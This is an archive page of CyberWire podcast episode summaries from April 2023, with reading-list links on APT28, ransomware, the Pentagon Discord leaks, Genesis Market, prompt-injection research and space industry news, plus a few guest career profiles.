    The UK National Cyber Security Centre (NCSC), NSA, CISA, and FBI are releasing this joint advisory to provide TTPs associated with APT28’s exploitation of Cisco routers in 2021.

    AA23-108A Alert, Technical Details, and Mitigations

    Malware Analysis Report

    Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Play ransomware's new tools. A look at what the GRU’s been up to. US Air Force opens investigation into alleged leaker's Air National Guard wing. KillNet’s new hacker course: “Dark School.” Apr 19, 2023

    Play ransomware's new tools. Fancy Bear is out and about. Updates on Sandworm. Ransomware in Russia's war against Ukraine. The US Air Force opens an investigation into the alleged leaker's Air National Guard wing. The Washington Post’s Tim Starks joins us with insights on the Biden administration's attempts to better secure the water supply. Carole Theriault chats with Cisco Talos' Vanja Svajcer about the threat landscape, now and tomorrow. And KillNet’s in the education business with a new hacker course: “Dark School.”


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/75


    Selected reading.

    Play Ransomware Group Using New Custom Data-Gathering Tools (Symantec)

    NCSC-UK, NSA, and Partners Advise about APT28 Exploitation of Cisco Routers (National Security Agency/Central Security Service)

    APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers (NCSC)

    State-sponsored campaigns target global network infrastructure (Cisco Talos Blog)

    Ukraine remains Russia’s biggest cyber focus in 2023 (Google)

    Fog of War: How the Ukraine Conflict Transformed the Cyber Threat Landscape (Google Threat Analysis Group)

    M-Trends 2023: Cybersecurity Insights From the Frontlines (Mandiant)

    Faltering against Ukraine, Russian hackers resort to ransomware: Researchers (Breaking Defense)

    Air Force unit in document leaks case loses intel mission (AP NEWS)

    Pentagon Details Review of Policies for Handling Classified Information (New York Times)

    Ukraine at D+419: GRU cyber ops scrutinized. (CyberWire)


    A Symposium, a wet dress, a new fund, and it’s only Monday. [T-Minus Space Daily] Apr 19, 2023

    Brace yourselves, it’s Space Symposium week! Wet dress rehearsal for Starship. UK launches the International Bilateral Fund. Orbit Fab gets a series A round. Boeing announces their anti-jam payload for WGS. The FAA wants to balance air travel and space travel. Our interview with Steve Luczynski, Board Chair of the Aerospace Village, on their mission, programs, and upcoming activities at the RSA Conference next week. All this and more.

    T-Minus Guest

    Our featured guest is Steve Luczynski, Board Chair of the Aerospace Village, on the Aerospace Village nonprofit, their mission, their programs, and their upcoming activities at the RSA Conference next week.

    You can follow Steve on LinkedIn and Twitter.

    Selected Reading

    SpaceX's launch of Starship could remake space exploration | Washington Post

    UK Space Agency funding for international space partnerships | GOV.UK

    SpaceX launches seventh Transporter rideshare mission | SpaceNews

    Exolaunch’s 21 rideshare smallsats deployed during the SpaceX Transporter-7 mission | SatNews

    HawkEye 360’s nexgen Cluster 7 smallsats are successfully launched | SatNews

    TrustPoint Announces Launch of First Commercially-Funded, Purpose-Built PNT Microsatellite | Business Wire

    China claims its Space Station has achieved 100% oxygen regeneration in orbit | Interesting Engineering

    Boeing Unveils Anti-Jam Payload For Next Space Force Wideband Global SATCOM Satellite | Via Satellite

    As counterspace weapons ‘proliferate,’ the new cold war for space races forward: studies | Breaking Defense

    The Moon is the Best Place to Transport Rocket Fuel | Universe Today

    US aviation authorities may delay some space launches to avoid air traffic disruption | Reuters

    NASA launches stadium-sized balloon from New Zealand | SpaceConnect


    Iranian threat actor exploits N-day vulnerabilities. Subdomain hijacking vulnerabilities. The Discord Papers. An update on Russia’s NTC Vulkan. And weather reports, not a Periodic Table. Apr 18, 2023

    An Iranian threat actor exploits N-day vulnerabilities. CSC exposes subdomain hijacking vulnerabilities. More on the Discord Papers. An update on Russia’s NTC Vulkan. Joe Carrigan on the aftermath of a $98M online investment fraud. Our guest is Blake Sobczak from Synack, host of the podcast WE'RE IN! And threat actor nomenclature: a scorecard, and a Periodic Table no more.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/74


    Selected reading.

    Nation-state threat actor Mint Sandstorm refines tradecraft to attack high-value targets (Microsoft Security)

    An Iranian hacking group went on the offensive against U.S. targets, Microsoft says (Washington Post)

    New CSC Research Finds One in Five DNS Records are Susceptible to Subdomain Hijacking Due to Insufficient Cyber Hygiene | CSC (CSC)

    DOD Assessing Document Disclosures and Implementing Mitigation Measures (U.S. Department of Defense)

    After leak, Pentagon purges some users' access to classified programs, launches security review (Breaking Defense)

    Why Did a 21-Year-Old Guardsman Have Access to State Secrets? (Vice)

    U.S. officials have examined whether alleged doc leaker had foreign links (POLITICO)

    The Air Force Loves War Gamers Like Alleged Leaker Teixeira (Military.com)

    FBI Investigating Ex-Navy Noncommissioned Officer Linked to Pro-Russia Social-Media Account (Wall Street Journal)

    Pentagon leak suggests Russia honing disinformation drive – report (the Guardian)

    Dragos Analyzes Russian Programs Threatening Critical Civilian Infrastructure (Dragos)

    Microsoft shifts to a new threat actor naming taxonomy (Microsoft)


    Developments in the Discord Papers, including notes on influencers and why they seek influence. Tax season scams. KillNet’s selling, but is anyone buying? Apr 17, 2023

    The alleged Discord Papers leaker has been charged. We look at how the Papers spread online. A life lived online as a security risk. US tax season scams, at the 11th filing hour. Caleb Barlow from Cylete on the layoffs in security that many thought would never happen. Maria Varmazis and Brandon Karpf share the launch of the new space podcast, T-Minus. And KillNet says it’s open for business.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/73


    Selected reading.

    Inside the furious week-long scramble to hunt down a massive Pentagon leak (CNN Politics)

    Massachusetts Air National Guard’s Intelligence Mission in the Spotlight (New York Times)

    Leaker of U.S. secret documents worked on military base, friend says (Washington Post)

    WSJ News Exclusive | Social-Media Account Overseen by Former Navy Noncommissioned Officer Helped Spread Secrets (Wall Street Journal)

    A Russian Disinformation Empire in Oak Harbor, Washington (Malcontent News)

    Pro-Russia propagandist unmasked as New Jersey tropical fish seller (The Telegraph)

    Suspect charged in case involving leaked classified military documents (Washington Post)

    Jack Teixeira, suspect in Pentagon leaks, charged under Espionage Act (the Guardian)

    Leak suspect appears in court as US spells out its case (AP NEWS)

    Airman in Pentagon intel leak charged (Military Times)

    Airman charged in Pentagon intel leak regretted joining the military (Military Times)

    He’s from a military family — and allegedly leaked U.S. secrets (Washington Post)

    Jack Teixeira's alleged Discord leaks show why the US should stop showering Top Secret clearances on 21-year-old keyboard warriors (Business Insider)

    The military loved Discord for Gen Z recruiting. Then the leaks began. (Washington Post)

    A new kind of leaker: Spilling state secrets to impress online buddies (Washington Post)

    Was the Gen-Z Pentagon leaker motivated by social media clout? (the Guardian)

    Microsoft president claims Russian intelligence is trying to "penetrate gaming communities" (GamesIndustry.biz)

    How Gamers Eclipsed Spies as an Intelligence Threat (Foreign Policy)

    Crafty PDF link is part of another tax-season malware campaign (Record)

    Tax season scams. (CyberWire)

    Ukraine at D+414: Discord Papers arrest, cyberespionage, and hacktivist DDoS. (CyberWire)


    Jack Chapman: Shielding against the bad guys. [Threat Intelligence] [Career Notes] Apr 16, 2023

    Jack Chapman, VP of Threat Intelligence at Egress sits down to share his story on how he found his way into the cybersecurity field as well as his journey creating a cybersecurity company that was successfully acquired. Jack previously co-founded anti-phishing company Aquilai and served as its Chief Technology Officer, working closely with the UK’s intelligence and cyber agency GCHQ to develop cutting-edge product capabilities. Aquilai was acquired by Egress in 2021. Now he is working with Egress as what he calls their "chief bad guy," helping to shield his team from threats. He says "I'm probably what you call a servant leader, my mission is to enable and shield my teams from things that will prevent them from succeeding in their missions, whatever that might look like." Jack hopes to be remembered for making a meaningful impact to help drive the field forward. We thank Jack for sharing his story with us.


    New Dero cryptojacking operation concentrates on locating Kubernetes. [Research Saturday] Apr 15, 2023

    Scott Fanning, Senior Director of Product Management, Cloud Security at CrowdStrike, sits down to talk about the first-ever Dero cryptojacking operation targeting Kubernetes infrastructure. The research defines Dero as "a cryptocurrency that claims to offer improved privacy, anonymity and higher and faster monetary rewards compared to Monero, which is a commonly used cryptocurrency in cryptojacking operations."

    CrowdStrike was the first organization to discover Dero, and has been observing the cryptojacking operation since the beginning of February 2023. The operation focuses mainly on locating Kubernetes clusters with anonymous access enabled on a Kubernetes API and listening on non-standard ports accessible from the internet.

    The research can be found here:

    • CrowdStrike Discovers First-Ever Dero Cryptojacking Campaign Targeting Kubernetes

    "Read the Manual" and the ransomware-as-a-service market. Bitter APT against energy companies. Cozy Bear sighting. Hacktivist auxiliaries hit Canadian targets. An arrest in the Discord Papers case. Apr 14, 2023

    "Read the Manual" and the ransomware-as-a-service market. Bitter APT may be targeting Asia-Pacific energy companies. A Cozy Bear sighting. Hacktivist auxiliaries hit Canadian targets. Deepen Desai of Zscaler describes job scams following tech layoffs. Our guest is Kelly Shortridge from Fastly with insights on the risks from bots. And there’s been an arrest in the Discord Papers case.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/72


    Selected reading.

    Read The Manual Locker: A Private RaaS Provider (Trellix)

    Phishing Campaign Targets Chinese Nuclear Energy Industry (Intezer)

    Espionage campaign linked to Russian intelligence services (Baza wiedzy)

    Russian cyberspies hit NATO and EU organizations with new malware toolset (CSO Online)

    Pro-Russia hackers say they were behind Hydro-Quebec cyberattack (Montreal CTV News - 04-13-2023)

    Cyberattack knocks out website and mobile app for Quebec’s hydro utility (Toronto Star)

    F.B.I. Arrests National Guardsman in Leak of Classified Document (New York Times)

    DOD Calls Document Leak 'a Criminal Act' (U.S. Department of Defense)


    Transparent Tribe seems to want people’s lab notes, and other stories of cyberespionage. The FBI warns of juicejacking. And the Discord leaker seems to have been a 20-something influencer. Apr 13, 2023

    Transparent Tribe expands its activity against India's education sector. A Lazarus sub-group is after defense sector targets. The FBI's Denver office warns of potential juicejacking. Legion: a Python-based credential harvester. The source of leaked US intelligence may be closer to identification. Johannes Ullrich from SANS explains Upwork scams. Our guest is Charlie "Tuna" Moore of Vanderbilt University on the cyber lessons from Russia’s war on Ukraine. Canada responds to claims of Russian cyberattacks.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/71


    Selected reading.

    Transparent Tribe (APT36) | Pakistan-Aligned Threat Actor Expands Interest in Indian Education Sector (SentinelOne)

    Following the Lazarus group by tracking DeathNote campaign (Securelist)

    DPRK threat actors target C3X and defense sector at large. (CyberWire)

    FBI office warns against using public phone charging stations at airports or malls, citing malware risk (CBS News)

    The FBI warns of juicejacking and other risks of public tech. (CyberWire)

    Legion: an AWS Credential Harvester and SMTP Hijacker (Cado Security)

    The Legion credential harvester. (CyberWire)

    Leaker of U.S. secret documents worked on military base, friend says (Washington Post)

    U.S. may change how it monitors the web after missing leaked documents for weeks (NBC News)

    Cyberattacks on Canada’s gas infrastructure left ‘no physical damage,’ Trudeau says (Global News)

    Russian attacks on Ukrainian infrastructure cause internet outages, cutting off a valuable wartime tool (CyberScoop)

    US Warns Russia Getting Creative in Cyberspace (VOA)

    APT Winter Vivern Resurfaces (Avertium)


    Patch Tuesday notes. Cyber mercenaries described. Voice security and fraud. CISA’s update to its Zero Trust Maturity Model. Updates on Russia’s hybrid war against Ukraine. Apr 12, 2023

    Patch Tuesday update. Another commercial surveillance company is outed. Voice security and the challenge of fraud. CISA updates its Zero Trust Maturity Model. Effects of the US intelligence leaks. Our guest Eric Goldstein, Executive Assistant Director for Cybersecurity at CISA, outlines CISA's role in the cybersecurity community. André Keartland of Netsurit makes the case for DevSecOps. Russian cyber auxiliaries believed responsible for disrupting the Canadian PM's website.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/70


    Selected reading.

    Patch Tuesday overview. (CyberWire)

    DEV-0196: QuaDream’s “KingsPawn” malware used to target civil society in Europe, North America, the Middle East, and Southeast Asia (Microsoft Threat Intelligence)

    Threat Report on the Surveillance-for-Hire Industry (Meta)

    Sweet QuaDreams: A First Look at Spyware Vendor QuaDream’s Exploits, Victims, and Customers (The Citizen Lab)

    Voice Intelligence and Security Report (Pindrop)

    CISA Releases updated Zero Trust Maturity Model (Cybersecurity and Infrastructure Security Agency)

    CISA Releases Zero Trust Maturity Model Version 2 (Cybersecurity and Infrastructure Security Agency CISA)

    A leak of files could be America’s worst intelligence breach in a decade (The Economist)

    Interagency Effort Assessing Impact of Leaked Documents, Strategizing Way Forward (U.S. Department of Defense)

    What we know about the Pentagon document leak (Axios)

    The ongoing scandal over leaked US intel documents, explained (Vox)

    Pentagon leak threatens Biden's foreign policy doctrine ahead of overseas trip (Axios)

    Schumer calls for all-senator briefing on leaked Ukraine documents (The Hill)

    The key countries and revelations from the Pentagon document leak (Washington Post)

    Exclusive: Leaked U.S. intel document claims Serbia agreed to arm Ukraine (Reuters)

    Up to 50 UK special forces present in Ukraine this year, US leak suggests (the Guardian)

    Egypt denies leak about supplying Russia with 40,000 rockets (Al Jazeera)

    DDoS attacks block PM Trudeau’s web site (IT World Canada)


    IAM trends. RagnarLocker as a critical infrastructure threat. AI hype as phishbait. Updates on the hybrid war: leaks and hacks. Apr 11, 2023

    Key trends in Identity and Access Management. RagnarLocker and critical infrastructure. Cyber criminals capitalize on the AI hype. Updates on the leaked US classified documents, and speculation about whether Russian hackers compromised a Canadian gas pipeline. Ben Yelin describes a multimillion dollar settlement over biometric data. Microsoft’s Ann Johnson from Afternoon Cyber Tea talks about cyber paradigm shifts with Samir Kapuria. And a welcome to GCHQ's new boss.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/69


    Selected reading.

    4 key trends from the Gartner IAM Summit 2023 (Venture Beat)

    Threat Actor Spotlight: Ragnarlocker Ransomware (Sygnia)

    From Chatgpt To Redline Stealer: The Dark Side Of Openai And Google Bard (Veriti)

    Biden administration doesn't know extent of classified Pentagon document leak (CBS News)

    Ukraine ‘alters counter-offensive plans’ after Pentagon leak (The Telegraph)

    Ukraine had to change military plans because of US Pentagon leak, source says (CNN)

    Leaked Pentagon documents claim that hackers breached a Canadian gas network. Here’s what to know. (Washington Post)

    Pro-Russia Hackers Say They Breached Canadian Pipeline, but Experts Are Skeptical (Wall Street Journal)

    Leaked US intel: Russia operatives claimed new ties with UAE (AP NEWS)

    Egypt secretly planned to supply rockets to Russia, leaked U.S. document says (Washington Post)

    How the Latest Leaked Documents Are Different From Past Breaches (New York Times)

    How U.S. friends and foes have responded to leaked Pentagon documents (Washington Post)

    Pentagon leaks: US seeks to mend ties after claims Washington spied on key allies (the Guardian)

    Pentagon Probe Under Way in Leaks Case (Wall Street Journal)

    Pentagon assessing damage after 'highly classified' US secrets leaked online (Breaking Defense)

    The Pentagon’s Purported Classified-Document Leak: The Biggest Takeaways and Questions So Far (Wall Street Journal)

    The ongoing scandal over leaked US intel documents, explained (Vox)

    Leaked documents a 'very serious' risk to security: Pentagon (AP NEWS)

    The Discord servers at the center of a massive US intelligence leak (CyberScoop)

    Social-Media Platform Discord Emerges at Center of Classified U.S. Documents Leak (Wall Street Journal)

    Why Leaked Pentagon Documents Are Still Circulating on Social Media (New York Times)

    Clues Left Online Might Aid Leak Investigation, Officials Say (New York Times)

    Ukraine at D+411: US leaks remain under investigation. (CyberWire)

    New Director GCHQ announced (GCHQ)


    A look at Iran’s MERCURY APT. Updates on Russia's hybrid war, including some apparent leaks and some apparent doxing. And notes on cloud security trends. Apr 10, 2023

    An Iranian APT MERCURY exploits known vulnerabilities. The US investigates apparent leaks of classified information about Russia's war against Ukraine. KillNet claims it has paralyzed NATO websites. More apparent doxing of the GRU. Britta Glade and Monica Koshgarian of RSA Conference talking about content curation. Grayson Milbourne from OpenText Cybersecurity hopes to remove shame from cyber attacks. And, finally, some notes on cloud security trends.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/68


    Selected reading.

    MERCURY and DEV-1084: Destructive attack on hybrid environment (Microsoft Threat Intelligence)

    Leaked US battlefield intelligence on Ukraine is fake, says Kyiv (The Telegraph)

    Russia Claims Leaked Pentagon Intelligence on Ukraine is U.S. Disinformation (US News and World Report)

    Leaked US secret NATO-Ukraine war docs likely altered, say experts (SC Media)

    Ukraine’s air defences could soon run out of missiles, apparent Pentagon leak suggests (the Guardian)

    Russia nearly shot down British spy plane near Ukraine, leaked document says (Washington Post)

    Justice Dept. will investigate leak of classified Pentagon documents (Washington Post)

    US investigating whether Ukraine war documents were leaked (Military Times)

    U.S. Reviewing Online Appearance Of Sensitive Documents Related To Ukraine, Pentagon Says (RadioFreeEurope/RadioLiberty)

    WSJ News Exclusive | Pentagon Investigates More Social-Media Posts Purporting to Include Secret U.S. Documents (Wall Street Journal)

    New Details on Intelligence Leak Show It Circulated for Weeks Before Raising Alarm (Wall Street Journal)

    Intelligence leak exposes U.S. spying on adversaries and allies (Washington Post)

    Secret US Documents on Ukraine War Plan Spill Onto Internet: Report (SecurityWeek)

    US hit by ‘worst leak of secret documents since Edward Snowden’ (The Telegraph)

    Ukraine at D+410: Static, sanguinary lines. (CyberWire)

    Report Finds 90% of IT Professionals Have Experienced a Cybersecurity Breach (Skyhigh Security)


    Karen Worstell: Keep your feet planted. [Strategy] [Career Notes] Apr 09, 2023

    Karen Worstell, Senior Cybersecurity Strategist at VMware, sits down to share her journey and discusses her experience as a woman in cyber. She started her career as a chemist after graduating with a bachelor's degree in chemistry and a bachelor's degree in molecular biology. After taking some time off to be with her family, she came back to a science field that was far more advanced than when she had left, so she decided to go in another direction, which led her to cyber. She started teaching herself programming and found she was very good at it. Now that she works in cyber, she says, "You, you have to know yourself, know what you want, and know where you're, know where you plant your feet. I used to use a phrase a lot that said, uh, don't be afraid to take a stand but know where your feet are planted." We thank Karen for sharing her story with us.


    A dark side to LLMs. [Research Saturday] Apr 08, 2023

    Sahar Abdelnabi from CISPA Helmholtz Center for Information Security sits down with Dave to discuss their work on "A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models." The capabilities of Large Language Models, or LLMs, are currently advancing rapidly, and LLMs are being integrated into many systems, including integrated development environments (IDEs) and search engines.

    The research states, "The functionalities of current LLMs can be modulated via natural language prompts, while their exact internal functionality remains implicit and unassessable." The same property that makes LLMs adaptable to unseen tasks could also make them susceptible to targeted adversarial prompting. The researchers demonstrated these attacks in order to determine whether LLMs need new defensive techniques.

    The research can be found here:

    • More than you've asked for: A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models

    Stopping Cobalt Strike abuse. Leaks are mingled with disinformation. Google offers advice for board members. Securing cars and their garages. CISA releases ICS advisories. Apr 07, 2023

    Preventing abuse of the Cobalt Strike pentesting tool. US investigates a leak of sensitive documents related to the war in Ukraine. Hacktivist activity continues. Google's advice for boards. Electronic lockpicks for electronic locks. Nexx security devices may have security flaws. Tesla employees reportedly shared images and videos from Teslas in the wild. Matt O'Neill from US Secret Service discussing investment crypto scams. Our guest is James Campbell of Cado Security on the challenges of a cloud transition. And CISA releases seven ICS advisories.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/67


    Selected reading.

    Stopping cybercriminals from abusing security tools (Microsoft On the Issues)

    Microsoft leads effort to disrupt illicit use of Cobalt Strike, a dangerous hacking tool in the wrong hands (CyberScoop)

    Ukraine War Plans Leak Prompts Pentagon Investigation (New York Times)

    DDoS attacks rise as pro-Russia groups attack Finland, Israel (TechRepublic)

    Perspectives on Security for the Board (Google Cloud)

    Thieves Use CAN Injection Hack to Steal Cars (SecurityWeek)

    How thieves steal cars using vehicle CAN bus (Register)

    Own a Nexx “smart” alarm or garage door opener? Get rid of it, or regret it (Graham Cluley)

    Hack and enter! The “secure” garage doors that anyone can open from anywhere – what you need to know (Naked Security)

    Special Report: Tesla workers shared sensitive images recorded by customer cars (Reuters)

    CISA Releases Seven Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency CISA)


    New phishing techniques. Arrests in the Genesis Market case. APT43’s Archipelago. Disinformation at the UN, and drop-shipping for Mother Russia. Apr 06, 2023

    New phishing techniques. Arrests in the Genesis Market case. APT43’s Archipelago. Russia's turn in the Security Council chair immediately becomes an occasion for disinformation. Our guest is Nick Tausek from Swimlane to discuss supply chain attack trends. Tim Starks from the Washington Post has the latest on the DOJ’s attempts to disrupt cyber crime. And, make robo-love, not robo-war: nuisance-level hacktivism in the interest of Ukraine.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/66


    Selected reading.

    New Phishing Campaign Exploits YouTube Attribution Links, Cloudflare Captcha (Vade Security)

    Criminal Marketplace Disrupted in International Cyber Operation (U.S. Department of Justice)

    Takedown of notorious hacker marketplace selling your identity to criminals | Europol (Europol)

    Notorious criminal marketplace selling victim identities taken down in international operation (National Crime Agency)

    Check your hack (Politie)

    Carr Announces Investigation into Suspected Users of Genesis Dark Web Marketplace Following FBI Takedown of Illicit Site (Office of Attorney General of Georgia Chris Carr)

    U.S., European Police Shut Down Hacker Marketplace, Make 119 Arrests (Wall Street Journal)

    120 Arrested as Cybercrime Website Genesis Market Seized by FBI (SecurityWeek)

    International cops put the squeeze on Genesis Market users (Register)

    FBI obtained detailed database exposing 60,000 users of the cybercrime bazaar Genesis Market (CyberScoop)

    Genesis Black Market Dismantled, But Experts Warn of Potential Vacuum (Nextgov.com)

    How we’re protecting users from government-backed attacks from North Korea (Google)

    Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks (The Hacker News)

    ‘Outrageous’: Russia Accused of Spreading Disinformation at U.N. Event (New York Times)

    Hackers bought 23,000 euros' worth of sex toys with Russian money (20 minutes)

    Thanks to Ukrainian hackers, war freak orders £20,000 worth of drones for Russian soldiers, gets sex toys instead (First Post)

    Ukrainian hackers exchange Russian fighter’s drone order for dildos (New York Post)

    ‘It’s bullshit’: Inside the weird, get-rich-quick world of dropshipping (WIRED)


    Genesis Market taken down. Proxyjackers exploit Log4j. Fast-encrypting Rorschach ransomware. More Killnet DDoS. Patch Zimbra now. Soft power and Russia’s hybrid war. Apr 05, 2023

    Genesis Market gets taken down. Proxyjackers exploit Log4j vulnerabilities. Fast-encrypting Rorschach ransomware uses DLL sideloading. Killnet attempts DDoS attacks against the German ministry. Carole Theriault ponders AI assisted cheating. Johannes Ullrich tracks malware injected in a popular tax filing website. Soft power and Russia’s hybrid war.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/65


    Selected reading.

    'Operation Cookie Monster': International police action seizes dark web market (Reuters)

    Stolen credential warehouse Genesis Market seized by FBI (Register)

    FBI Seizes Bot Shop ‘Genesis Market’ Amid Arrests Targeting Operators, Suppliers (KrebsOnSecurity)

    Genesis Market, one of world’s largest platforms for cyber fraud, seized by police (Record)

    'Operation Cookie Monster': FBI seizes popular cybercrime forum used for large-scale identity theft (CNN)

    Cybercrime marketplace Genesis Market shut by FBI, international law enforcement (CNBC)

    FBI seizes stolen credentials market Genesis in Operation Cookie Monster (BleepingComputer)

    Notorious Genesis Market cybercrime forum seized in international law enforcement operation (CyberScoop)

    Proxyjacking has Entered the Chat (Sysdig)

    Rorschach – A New Sophisticated and Fast Ransomware (Check Point Research)

    Russian hackers attack German ministry’s website (TVP World)

    Zimbra Flaw Exploited by Russia Against NATO Countries Added to CISA 'Must Patch' List (SecurityWeek)

    Zimbra vulnerability exploited by Russian hackers targeting Nato countries - CISA (Tech Monitor)

    CISA Adds One Known Exploited Vulnerability to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

    NVD - CVE-2022-27926 (National Vulnerability Database)

    The Interview - Russian cyber weapons 'could do a lot of damage' in the US: Former counterterrorism czar (France 24)

    Biden cybersecurity chief 'surprised' Russia has not hit US targets amid Ukraine war (Washington Examiner)

    Ukrainian Cyber War Confirms the Lesson: Cyber Power Requires Soft Power (Council on Foreign Relations)


    Cyber appeasement? Western Digital discloses cyberattack. Rilide malware is in active use. Mantis has new mandibles. Challenges of threat hunting. Small, medium, and large criminal enterprises. Apr 04, 2023

    Did "appeasement" embolden Russia's cyber operators? Western Digital discloses a cyberattack. Rilide is a new strain of malware in active use. The Mantis cyberespionage group uses new, robust tools and tactics. The challenges of threat hunting. Joe Carrigan has thoughts on public school systems making cyber security part of the curriculum. Our guest May Mitchell of Open Systems addresses closing the talent gap. And when it comes to criminal enterprise, size matters.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/64


    Selected reading.

    Russia's shadow war: Vulkan files leak show how Putin's regime weaponises cyberspace (The Conversation)

    Russia's Invasion of Ukraine Heralds New Era of Warfare (VOA)

    West’s Cyber Appeasement Gave Putin Green Light: James Stavridis (Bloomberg Law)

    Western Digital Provides Information on Network Security Incident (Business Wire)

    Western Digital confirms breach, shuts down systems (Computing)

    Western Digital discloses network breach, My Cloud service down (BleepingComputer)

    WD says law enforcement probing breach of internal systems (Register)

    Western Digital investigating MyCloud data breach affecting Mac desktop drives (Macworld)

    Users fume after My Cloud network breach locks them out of their data (Ars Technica)

    Typhon Reborn V2: Updated stealer features enhanced anti-analysis and evasion capabilities (Cisco Talos Blog)

    Mantis: New Tooling Used in Attacks Against Palestinian Targets (Symantec)

    Inside the Mind of a Threat Hunter: Team Cymru's Latest Report Sheds Light on Challenges Faced by Cybersecurity Analysts (Accesswire)

    Wages Dominate Cybercrime Groups' Operating Expenses (PR Newswire)

    Inside the Halls of a Cybercrime Business (Trend Micro)

    Size Matters: Unraveling the Structure of Modern Cybercrime Organizations (Trend Micro)


    "Cylance" ransomware (no relation to Cylance). Update on the 3CX incident. The FSB's arrest of Evan Gershkovich. Ukrainian hacktivist social engineering in the hybrid war. Apr 03, 2023

    "Cylance" the ransomware (with no relation to Cylance, the security company). An update on the 3CX incident. The FSB's arrest of a Wall Street Journal reporter. Simone Petrella from N2K Networks unpacks 2023 cybersecurity training trends. Deepen Desai from Zscaler has the latest on cloud security. And hacktivists claim to have tricked wives of Russian combat pilots into revealing personal information.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/63


    Selected reading.

    "Cylance" ransomware (no relation to Cylance). (CyberWire Pro)

    New Cylance Ransomware Targets Linux and Windows, Warn Researchers (HackRead)

    New Cylance Ransomware strain emerges, experts speculate about its notorious members (IT PRO)

    More evidence links 3CX supply-chain attack to North Korean hacking group (Record)

    3CX supply chain attack: the unanswered questions (Computing)

    3CX Desktop App Compromised (CVE-2023-29059) (Fortinet Blog)

    Evan Gershkovich Loved Russia, the Country That Turned on Him (Wall Street Journal)

    The Ukrainian hoax that revealed the Russian pilots who bombed Mariupol theatre (The Telegraph)

    Ukrainian Hacktivists Trick Russian Military Wives for Personal Info (HackRead)


    Alon Jackson: Sometimes you feel like an octopus. [CEO] [Career Notes] Apr 02, 2023

    Alon Jackson, chief executive and co-founder of Astrix Security, sits down to share his story of rising success. Before moving to the vendor side of things, Jackson served in various strategic roles in the Cyber Security Division of the Israeli Military Intelligence Unit 8200 for more than 8 years, including leading the Cloud Security division and serving as the Head of the Cyber Security R&D Department. His experience in the military inspired him to learn more about the industry and jump to the private sector. Years later, he co-founded his company to help address security gaps seen in the industry. He mentions how being a start-up CEO can be difficult at times, and how it may feel as though you're an octopus with all the multitasking that comes with the job. Alon says that one of his main goals as a contributor in this industry is making sure people remember him and his company for years to come, saying he wants to help by "building a company that people kind of know about, remember, and is important in the world." We thank Alon for sharing his story with us.


    Blackfly flies back again. [Research Saturday] Apr 01, 2023

    Dick O'Brien from Symantec’s Threat Hunter team discusses their research on "Blackfly - Espionage Group Targets Materials Technology." Researchers say the Blackfly espionage group (aka APT41), has been mounting attacks against Asian materials and composite organizations in attempts to steal intellectual property.

    Active since at least 2010, this group is one of the longest-running known Chinese advanced persistent threat (APT) groups. The research shares that "early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families."

    The research can be found here:

    • Blackfly: Espionage Group Targets Materials Technology

    A glimpse into Mr. Putin’s cyber war room. 3CXDesktopApp supply chain risk. XSS flaw in Azure SFX can lead to remote code execution. AlienFox targets misconfigured servers. Mar 31, 2023

    The Vulkan papers offer a glimpse into Mr. Putin’s cyber war room. The 3CXDesktopApp vulnerability and supply chain risk. A cross site scripting flaw in Azure Service Fabric Explorer can lead to remote code execution. Rob Boyce from Accenture Security on threats to EV charging stations. Our guest is Steve Benton from Anomali Threat Research, sharing a ‘less is more’ approach to cybersecurity. And AlienFox targets misconfigured servers.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/62


    Selected reading.

    A Look Inside Putin's Secret Plans for Cyber-Warfare (Spiegel)

    Secret trove offers rare look into Russian cyberwar ambitions (Washington Post)

    7 takeaways from the Vulkan Files investigation (Washington Post)

    ‘Vulkan files’ leak reveals Putin’s global and domestic cyberwarfare tactics (the Guardian)

    Contracts Identify Cyber Operations Projects from Russian Company NTC Vulkan (Mandiant)

    3CX DesktopApp Security Alert - Mandiant Appointed to Investigate (3CX)

    Information on Attacks Involving 3CX Desktop App (Trend Micro)

